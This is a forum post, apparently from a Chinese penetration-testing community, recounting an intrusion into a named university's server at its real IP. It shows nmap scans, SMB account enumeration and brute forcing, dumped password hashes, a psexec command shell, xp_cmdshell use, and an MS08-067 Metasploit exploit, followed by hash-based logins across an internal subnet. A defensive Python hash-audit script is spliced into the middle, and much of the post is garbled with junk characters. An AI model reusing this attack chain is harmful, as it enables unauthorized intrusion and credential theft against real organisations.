中国网络渗透测试联盟

Title: nmap+msf intrusion of Guangxi Normal University

Author: admin    Time: 2012-12-4 12:46
Title: nmap+msf intrusion of Guangxi Normal University
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
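The smb-pwdump output above lists each account's LM and NT hash. As an added example, not part of the original post, the following Python script parses records in that format and flags what an administrator auditing such a dump should act on: blank passwords, LM hashes still being stored at all, and an LM second half equal to the empty-string constant, which reveals a password of 7 characters or fewer (the page's test:123456 account shows exactly that). The sample records are the four lines from the page; the constant names and the function audit_pwdump are my own.

```python
import re

# LM hashing splits the upper-cased password into two 7-character halves and
# encrypts a constant with each; the half for an empty string is always this value.
LM_EMPTY_HALF = "AAD3B435B51404EE"
LM_EMPTY = LM_EMPTY_HALF * 2
# NT hash of the empty password (MD4 of the empty UTF-16LE string).
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"
# pwdump's marker for an account with no stored hash of that type.
PWDUMP_BLANK = "NO PASSWORD"

# One "user:rid => lm_hash:nt_hash" record, with or without nmap's "| " / "|_" prefix.
RECORD = re.compile(
    r"^\|?_?\s*(?P<user>[^:|]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+?)\s*$"
)

# Constructed sample: the four smb-pwdump records shown on the page.
SAMPLE = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""


def audit_pwdump(text):
    """Map each account in pwdump-style output to a list of findings."""
    results = {}
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if not m:
            continue  # header lines such as "| smb-pwdump:" carry no record
        user, rid = m["user"].strip(), int(m["rid"])
        lm, nt = m["lm"].strip().upper(), m["nt"].strip().upper()
        findings = []
        nt_blank = nt.startswith(PWDUMP_BLANK) or nt == NT_EMPTY
        lm_blank = lm.startswith(PWDUMP_BLANK) or lm == LM_EMPTY
        if nt_blank:
            findings.append("blank password")
            if rid == 500:
                findings.append("built-in Administrator (RID 500) has no password")
        if not lm_blank:
            # Any stored LM hash is crackable offline; the empty second half
            # additionally tells an attacker the password is at most 7 characters.
            findings.append("LM hash stored (legacy, crackable offline)")
            if lm[16:] == LM_EMPTY_HALF:
                findings.append("password is 7 characters or fewer")
        results[user] = findings
    return results


if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE).items():
        print(f"{user}: {', '.join(findings) or 'no finding'}")
```

Disabling LM hash storage (NoLMHash policy) and enforcing a minimum password length removes both of the non-blank findings this script raises.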
7 A: G& H) Q- c$ C1 K4 W- P# C" H+ U; b4 r1 a% y
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell) t5 o2 \, R" V& c8 ?
  f/ _7 `5 D$ q+ [$ l. }7 y
-p 123456 -e cmd.exe
) M$ A2 o5 U& D; S; ]  L# M* o- I3 H! g) z' I
PsExec v1.55 – Execute processes remotely
( Q. h: q6 i( |# E5 K
$ x5 u. i2 t4 y& V4 NCopyright (C) 2001-2004 Mark Russinovich8 \+ {+ |  b3 B2 w/ |/ \1 g
. B1 @  N$ a' U% A. s
Sysinternals – www.sysinternals.com
9 `# w1 p* @" D6 G9 g3 ~5 M3 U& ~# N  c
Microsoft Windows 2000 [Version 5.00.2195]
4 E- a5 s# K+ Z4 s
5 y7 x( U  ~8 I6 \' ~0 R. {2 b( u/ V(C) 版权所有 1985-2000 Microsoft Corp.2 c: z. X: t% ]! @! V) x2 b

  Q2 N- b3 b8 s+ ~& l; KC:\WINNT\system32>ipconfig
& N  G# Z5 l- M7 A: r
- G& Y0 X% I& K/ A' cWindows 2000 IP Configuration5 S- x1 [$ d5 M  g

, D3 y; [5 s( F' W2 fEthernet adapter 本地连接:
# m' h( {5 O# k% C: e9 `  n: d! x7 F* X+ \9 ~: i/ i, A
Connection-specific DNS Suffix  . :
6 E* p5 {" }2 d3 i6 _2 z
, r9 K9 [7 G% @& x  w$ t& EIP Address. . . . . . . . . . . . : 202.103.242.241# W: K" l8 Y. l4 E

' c- e: l9 S2 w. R3 y0 oSubnet Mask . . . . . . . . . . . : 255.255.255.0
: x: d" C( t7 _% Y) o; J: z1 |# u: }6 `; G6 @9 B, N
Default Gateway . . . . . . . . . : 202.103.1.1
9 |% z5 Z  S4 R8 N1 ?9 x& V7 B
3 }% s& i% u  v/ t3 sC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令( k8 j4 D- ^. j

& T0 p9 M& }8 groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
8 g( t' Y, @: E+ {- w) K0 B, w
1 e3 @/ i9 |3 `( `Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST6 V+ L: m) ^; F! @: x$ u

9 b+ L4 E! k* r6 l; a, E8 y" _Nmap scan report for bogon (202.103.242.241)
( i1 E, B- z0 b* k: Y8 u" Q8 h2 p- G5 `5 s& d9 E4 t) {
Host is up (0.00046s latency).! C9 ]( u/ T6 x( j* S9 n6 ^2 p" w

- t" D: R- y3 M# ]6 ^; r4 v0 A1 \Not shown: 993 closed ports3 k2 Y% F1 q8 w( w' U& g- ~% t. m
# @! O- O, Z/ h' P5 l" q1 v+ I
PORT     STATE SERVICE
  I( P( p1 _9 C$ c+ \5 F7 B$ d; f5 y9 q( Y2 r
135/tcp  open  msrpc
4 f2 u! y  Q) P9 d9 H( D* ]
8 T2 Z) Z, L9 Y/ K2 A' [: ]139/tcp  open  netbios-ssn
2 h  `- o- P3 n
  ?# M4 g1 d# \, c) X2 T# q0 w445/tcp  open  microsoft-ds7 u' w6 w6 ~1 O

* Y( s5 Y8 U$ O% K4 d1025/tcp open  NFS-or-IIS
( y$ x1 B7 e$ R$ V8 [) C# O
! ^) I3 R& r# j# q1 j$ u0 K; C9 N1026/tcp open  LSA-or-nterm4 J8 J3 l6 u8 \) j& W3 p9 z& {

; [* j$ R% z* ^: ~3372/tcp open  msdtc* Y: d4 u* U3 c
# D' Y, g. j" o
3389/tcp open  ms-term-serv* u3 L9 n  V) i4 f5 o9 O# q
9 o. _% t1 r7 B/ N, S; J
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): t0 `7 z6 T0 [7 d! ]& K. G
' b7 f7 A" K6 ?1 m0 T
Host script results:) \5 Y; J! f1 V, I. R! t
4 E2 a) r' f+ T  I( Y
| smb-check-vulns:" t2 @4 _4 D- K2 W
: l; g& z' c! ~1 Y9 h
|_  MS08-067: VULNERABLE
9 }. Q7 L7 s, e
( n( p# R( ~+ p/ p- i9 ?: c/ |Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds( h! H3 W( Z2 ?( ]9 A
- A! O9 m1 Y4 P- `% s, o& F9 Q
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出" F# k- l9 a$ y: ?  k# z/ Z; E- G* C

( r7 n3 g; V* Kmsf > search ms08
% y( \4 p) w8 S2 a& t# B
( S  |, c4 y% }* m& @4 [3 Zmsf > use exploit/windows/smb/ms08_067_netapi
! }- c9 u9 W; F0 `3 M
! o! y% H6 T- y( Ymsf  exploit(ms08_067_netapi) > show options! D4 d8 I/ K, g0 `/ L2 E& H

0 [+ a( G' X) ymsf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
6 h% `6 r' A+ z
) \1 ~0 a0 S) m  `  d3 vmsf  exploit(ms08_067_netapi) > show payloads  P; Z$ `5 l1 a4 U: S( Q* s5 v
- |% u; ~# S+ @
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  D  K; k- N, g% Q9 t1 P8 L- e3 S
# V& `! S7 r: O) q- h6 Q$ emsf  exploit(ms08_067_netapi) > exploit
7 ~) a3 V8 Q* Z3 e% m
- v% N  N  {% `0 b* |. P5 [meterpreter >
; E1 j+ K8 h& G/ A
8 a! {2 E. K/ \: z9 _Background session 2? [y/N]  (ctrl+z)
' a. ^- n$ U( o: T0 e; s  ~; m/ k5 W* z0 T, T  W- `
msf  exploit(ms08_067_netapi) > sessions -l% W# t# o! O" i: P, u
( I# E; F) o. V2 n6 |+ Z
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
1 i9 j5 C/ M' N/ [% \1 ]9 ?( D  p- s+ M9 v3 U. W0 X
test
# b" Y# E( i* F% E0 T( ?8 d  A  C* F1 ]; r6 f6 S# t
administrator! C8 a4 h* i! d% L2 w

/ w- J) Z# K: K* broot@bt:/usr/local/share/nmap/scripts# vim password.txt( o6 R1 V0 l7 `2 \

8 s5 N8 F) v  k" _44EFCE164AB921CAAAD3B435B51404EE' \$ ]4 ^; Z" x. S5 X
5 w( ^6 |! `; v1 e
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 6 q9 E3 U' a" h. T. `
: K4 ?2 y8 h, F
//利用用户名跟获取的hash尝试对整段内网进行登录+ i1 u7 r/ [% Q; m7 F

0 V  w. E+ R$ l' }Nmap scan report for 192.168.1.1055 u. S& n( u3 V$ H- y9 R

5 W) P! [) G. bHost is up (0.00088s latency).
+ N3 J, ?. G* f5 i
4 b5 L8 a3 W- F* s8 \Not shown: 993 closed ports
4 r' |- }. m& d9 L6 z% T/ M1 f2 {% P/ l9 {$ l
PORT     STATE SERVICE
  N% P/ I7 R5 q: `3 A4 T- Y; \
0 c. M% j+ Q1 i  o135/tcp  open  msrpc% P( m$ I" ]( Y0 @

& G" m% e" T& q- d  j# O139/tcp  open  netbios-ssn
1 P. U% ?( Z, K2 n! O' ^1 z1 }% U) ~2 J/ }# a: i+ N
445/tcp  open  microsoft-ds
" E9 S& T; `/ `% E- g$ v
( j9 v. n! ]: D1 V1025/tcp open  NFS-or-IIS4 X9 G, h9 P- j  [* M

9 z$ ^0 Q7 D, D" C1026/tcp open  LSA-or-nterm
5 ?* K6 Z7 O/ P6 l, _' n' z3 C5 N: U# K' ?8 ~; j
3372/tcp open  msdtc
9 o3 `" [3 `/ Y5 h6 r5 Q1 v: O8 Z: {- Q* S: I' q  Q3 J# k1 V
3389/tcp open  ms-term-serv
$ n" n8 \) h+ I# O+ |2 y' N' p. O7 w: S" L5 H- b5 k+ F6 u
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% C0 K( ~$ u. O3 _  Y2 e( c7 d( `6 z; S; h8 m! V8 j
Host script results:( |- o. A8 W  x/ @* @
3 b, Q' i2 F# x9 k2 ]" c: r. I# ^
| smb-brute:6 ?  S$ G. ?/ {( D) |0 H0 F

- b4 [; J6 ^8 |/ z, G% k|_  administrator:<blank> => Login was successful
0 H; @# H3 V8 X& k$ `+ e- f7 A' k2 f: r6 v( r& Z! v
攻击成功,一个简单的msf+nmap攻击~~·: o& w& u; [" A/ a: ~+ ~$ M